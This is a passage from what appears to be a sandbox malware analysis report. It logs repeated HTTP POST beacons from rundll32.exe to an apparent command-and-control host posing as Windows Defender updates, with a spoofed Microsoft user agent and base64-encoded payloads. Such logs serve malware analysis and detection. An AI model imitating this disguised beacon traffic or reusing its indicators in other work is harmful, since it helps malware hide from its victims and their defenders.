                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:19.135976076 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:18 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.549800185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:19.401577950 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:20.838905096 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:20 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.549801185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:21.139069080 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:22.575979948 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:22 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.549802185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:22.835859060 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:24.296380043 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:23 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.549803185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:24.554583073 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:26.062103033 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:25 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.549804185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:26.319221973 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:27.810983896 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:27 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.549805185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:28.070610046 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:29.530549049 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:29 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.549806185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:29.788479090 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:31.262608051 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:30 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.549807185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:31.530654907 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:32.980957031 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:32 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.549808185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:33.420878887 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:34.861421108 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:34 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.549809185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:35.118546009 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:36.581568956 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:36 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.549810185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:36.835350037 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
